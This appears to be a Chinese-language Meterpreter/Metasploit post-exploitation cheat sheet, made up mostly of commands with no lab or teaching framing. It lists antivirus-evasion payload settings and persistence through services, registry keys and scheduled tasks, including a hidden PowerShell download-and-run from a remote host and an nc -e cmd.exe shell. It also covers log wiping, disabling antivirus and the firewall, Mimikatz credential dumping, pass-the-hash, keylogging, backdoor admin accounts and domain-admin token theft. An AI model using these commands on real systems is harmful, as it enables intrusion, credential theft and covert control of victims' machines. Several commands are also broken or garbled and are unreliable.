Meterpreter

监听

AutoRunScrip：自动执行脚本

如：自动执行post/windows/manage/migrate

set AutoRunScript post/windows/manage/migrate
set autorunscript migrate -f #获取shell后，将自动迁移到另一个进程

自动注入进程

set prependmigrate true
set prependmigrateProc svchost.exe

set exitonsession false  //可以让建立监听的端口继续保持侦听，可以接受多个session
set stagerverifysslcert false  //防止获取shell的时候出现的SSL_accept错误

免杀

将控制端向被控制端发送的stage进行编码，从而绕过symantec的查杀

set EnableStageEncoding true
set stageencoder x86/fnstenv_mov
set stageencodingfallback false

相当于使用RC4

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=xxx lport=xxxx RC4PASSWORD=yourpass -f c

利用rc4对传输的数据进行加密，密钥在生成时指定，在监听的服务端设置相同的密钥。可以绕过symantec，且不用设置stageencoder选项，更稳定更方便

绕过杀软的添加自启动

exploit/windows/local/registry_persistence

同类型的还有其他payload，如

exploit/windows/local/vss_persistence，exploit/windows/local/s4u_persistence

后门脚本

1.persistence

metasploit/scripts/meterpreter/persistence

用于创建通过启动项启动。会创建注册表，创建文件，但是很容易被杀软拦截。
命令示例：

run persistence -A -U -i  -p  -r 192.168.2.101

使用-S可创建服务。-U 会在HKCU添加启动项，-X 会在HKLM添加启动项
能实现同样功能的脚本还有：

exploit/windows/local/persistence.rb
exploit/windows/local/registry_persistence.rb

2.metsvc.rb

metasploit/scripts/meterpreter/metsvc.rb

用于创建服务启动。会创建meterpreter服务，并上传三个文件。很容易被杀软拦截，且安装服务需要管理员权限。

命令：

run metsvc -A

使用 -r 参数可卸载服务。

3、Scheduleme & Schtasksabuse

metasploit/scripts/meterpreter/scheduleme.rb
metasploit/scripts/meterpreter/schtasksabuse.rb

这两个脚本都是通过schtasks来创建计划任务来达到维持权限的目的

区别是scheduleme 需要当前进程拥有最高管理权限，而schtasksabuse则不需要，（测试发现很容易被杀软拦截）。
使用举例：

run scheduleme -m  -e /tmp/nc.exe -o "-e cmd.exe -L -p 8080" #上传nc并创建计划任务每一分钟执行一次 'nc -e cmd.exe -L -p 8080'
run scheduleme -m  -c "cmd /c calc.exe" # 创建计划任务每一分钟执行一次打开计算器命令

其他参数有兴趣自己看看就不详细介绍了

schtasksabuse

run schtasksabuse -t 192.168.2.7 -c "cmd /c calc.exe" -d   #每隔4秒执行一次calc.exe

使用脚本需要加-t参数
能实现同样功能的脚本还有：exploits/windows/local/s4u_persistence

4. Mof_ps_persist
 
Powershell之MOF后门 提到过，创建WMI后门的一种方式，可以在你的MSF添加此脚本。(运行需要管理员权限，不容易被拦截)

绕过拦截的计划任务：

schtasks /create /tn mytask /tr notepad.exe /sc hourly /mo  #每小时执行一次

设置持久化后门

设置powershell脚本开机自启动后门

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""
sc config “name” start= auto
sc description “name” “description” 设置服务的描述字符串
net start “name” 启动服务
sc delete “name” 删除这个服务，不想使用服务直接删除

创建自启动木马服务

先创建一个服务名称后面跟着木马上传的路径，这里如果要保证”windows Service EXE程序不被杀毒软件拦截,最好做下免杀,在放到更加隐蔽的目录

sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"
sc description "server power" "description" 设置服务的描述字符串
sc config "server power" start= auto 设置这个服务为自动启动
net start "server power" 启动服务 

也可以用注册表添加自启动

生成一个exe木马程序（免杀）

设置开机启动项，往注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run添加木马程序路径

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f 

当系统注销,再次进入登入到目标系统就会上线,权限是继承的。

Meterpreter后渗透命令

基本命令

ps/migrate/sysinfo/screenshot /background

cd/cat/ls/del/mkdir/rm/edit
edit c:\\windows\\system32\\drivers\\etc\\hosts　　编辑文件

upload /root/nc.exe c:\\windows\\system32　　#上传
download c:\\Programs Files\\Tecent\\QQ\\Users\\qq号\\Msg2..db /etc(聊天记录) #下载目标聊天记录，可用Qqlogger查看

clearev --清除日志
run killav --干掉杀软
run vnc --开启目标vnc服务
run scraper    --列举系统及用户敏感信息、下载用户注册表
run metsvc --在目标上将meterpreter安装为后门服务，

绕过 UAC

meterpreter> run post/windows/escalate/bypassuac

uictl enable keyboard/mouse 　　 #获取键盘或鼠标的控制权
timestomp 文件a -f 文件b    　　    #把文件a的时间信息设置的与b相同
run webcam -p 图片保存路径    　　#开启目标摄像头并截图
run packetrecorder –i 会话序号    　　    #捕获流量数据包.pcap

setdesktop 　　 -更改 meterpreter 桌面
sessions –u 会话序号 　　 #将shenll会话转换成meterpreter
getwd –显示目录    　　    lcd -更改目录
getprivs 　　-获取更多特权    　　    getpid -获取当前进程 ID (PID)
getsystem 　　获得系统权限　　    getuid -获取作为运行服务器的用户
search –d c:\\windows –f *.mdb    　　 #在目标主机Windows目录中搜索文件

提权

use priv
getsystem
getuid

执行程序

execute -H -i -f cmd.exe #隐藏执行cmd并与之交互
execute -H -m -d calc.exe -f wce.exe -a “-o foo.txt”
#隐藏，从内存中，显示虚假运行程序，执行恶意程序

搜集信息

run post/windows/gather/forensics/enum_drivers    #获取磁盘分区信息
run post/windows/gather/checkvm (run checkvm)    #检测是否为虚拟机
run post/windows/gather/dumplinks    --查看目标最近系统操作路径(较慢)
run post/windows/gather/enum_applications #查看目标的软件更新和补丁

获取hash

hashdump或run hashdump或run smart_hashdump
>run post/windows/gather/hashdump
>run /windows/gather/smart_hashdump    --可绕过windows UAC控制

reg command #修改注册表

run getgui –u 建立用户名 –p 建立用户的密码 #建立账户并开启远程终端
run multi_console_command –rc /root/.msf3/logs/scripts/getgui/clean_up_*.rc 　　#清除脚本痕迹

键盘记录

keyscan_start keyscan_dump   keyscan_stop

run post/windows/capture/keylog_recorder

嗅探

msf > use auxiliary/sniffer/psnuffle

msf auxiliary(psnuffle) > run

开启 RDP 服务

reg add "hklm\system\currentcontrolset\control\terminal server"
/f /v fDenyTSConnections /t REG_DWORD /d
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
关闭 Windows 防火墙
netsh firewall set opmode disable

开启vnc

meterpreter>runvnc
meterpreter>runscreen_unlock

远程连接
我们尝试用RDP连接到Windows 7，。

>use post/windows/manage/enable_rdp　　首先在msfconsole运行enable_rdp模块
>set SESSION 　　把SESSION设置为无UAC限制的有权限的session
>run
然后用haxtorDaMan账号登录
：xfreerdp /v:192.168.1.108 /port:/size:×/u:haxtorDaMan /p:hax@Pass50

端口转发与远程桌面连接

portfwd add –l (转发至本机的端口号) –p  -r 目标IP
rdesktop [-u 用户名 –p 密码] 127.0.0.1:
rdesktop 192.168.1.3 -f 1024x768
远程挂在本地文件夹（本地/home和/root文件夹挂在到远程服务器上分别命名为h和r）
redsktop 192.168.1.3 -r disk:h=/home，r=/root
共享剪贴板: redsktop 192.168.1.3 -r clipboard:PRIMARYCLIPBOARD

Meterpreter 端口转发

https://www.offensive­security.com/metasploit­unleashed/portfwd/ 

#
# 反弹10.1.1.129端口3389到本地2222并监听
meterpreter > portfwd add -l  -r 10.1.1.129 -p
root@kali:~# rdesktop 127.1.1.0:

使用 Mimikatz 获取 Windows 明文用户名密码

git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full

用kiwi获取明文密码：

meterpreter>load kiwi
meterpreter> creds_all
meterpreter> lsa_dump_sam

使用mimikatz自带的命令：

meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
<前面一句命令在密码超过14位时LM会为空，后一句命令可能得到明文>

Metaspolit中使用Mimikatz:

使用metasploit内建的命令：
meterpreter > load mimikatz
meterpreter > msv   #msv creden
meterpreter > kerberostials #kerberos credentials 

获取到系统hash置换，可以去http://www.cmd5.com/进行NTLM解密

当获取到密码的hash之后无法破解出明文密码且无法直接使用hash登陆，需要使用
pass-the-hash技术：

msf>use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST  xxxx
set LPORT  xxxx
set RHOST  xxxx
set SMBPassword xxxx
exploit

传递哈希攻击

meterpreter > run post /windows/ gather/hashdump
Administrator::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit /windows/ smb/psexec
msf exploit(psexec) > set payload windows /meterpreter/ reverse_tcp
msf exploit(psexec) > set SMBPass
e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

显示远程机器的防火墙规则，列出DEP和UAC策略。并禁用之

> run getcountermeasure
> run getcountermeasure -h
> run getcountermeasure -d -k

提权一般步骤

> use priv > getsystem
> ps > steal_token
> shell
net user hack password /add /DOMAIN
net group "DomainAdmins" hack /add /DOMAIN

创建一个管理员帐号 (haxtorDaMan) 把它提升到管理员组，并且成为远程桌面用户
net user haxtorDaManhax@Pass50 /add
net localgroup “Administrators” haxtorDaMan /add
net localgroup“Remote Desktop Users” haxtorDaMan /

令牌模拟:

当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限， 之后登陆其他机器时不需要登陆密码。
> ps # 查看进程， 找出域控账户运行的进程 ID， 如 PID为
> steal_token
有时 ps命令列出的进程中可能不存在域控账户的进程，
此时使用 incognito模块查看可用 token：
> use incognito (use priv4    getsystem)
> list_tokens –u    #列出可用 token
> impersonate_token SNEAKS.IN\\ihazdomainadmin
> add_user hacker password –h 域控制器IP #在域控主机上添加账户
> add_group_user “Domain Admins” hacker –h IP #将账户添加至域管理员

使用 Railgun操作 windowsAPIs

例：
meterpreter> irb
>>client.core.use(“railgun”)    #添加Railgun模块
>>client.railgun.user32.MessageBoxA(o,“我是hack!”,“world”,“MB_OK”)
#在目标机器上会弹出一个标题栏为 world，内容为“我是hack！”的窗口
>>client.railgun.user32.MessageBoxA(,“我是hack!”,NULL,“MB_OK”)
>> client.railgun.kernel32.SetThreadExecutionState(“ES_CONTINUOUS | ES_SYSTEM_
REQUIRED”)    #阻止目标主机进入睡眠状态